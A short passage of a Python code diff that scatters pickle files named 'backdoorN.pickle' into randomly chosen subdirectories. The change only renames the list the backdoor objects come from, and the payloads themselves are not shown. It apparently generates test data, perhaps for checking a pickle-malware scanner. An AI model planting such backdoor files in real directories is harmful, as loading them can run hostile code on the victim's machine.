Path(root_path).glob("*") if p.is_dir()] paths = random.sample(all_path, random.randrange(1, len(all_path))) for path in paths: - backdoor_id = random.randrange(0, len(backdoors)) - backdoor = backdoors[backdoor_id] + backdoor_id = random.randrange(0, len(backdoors_pickle)) + backdoor = backdoors_pickle[backdoor_id] filename = os.path.join(path, f"backdoor{backdoor_id}.pickle") with open(filename, "wb") as f: pickle.dump(backdoor, f)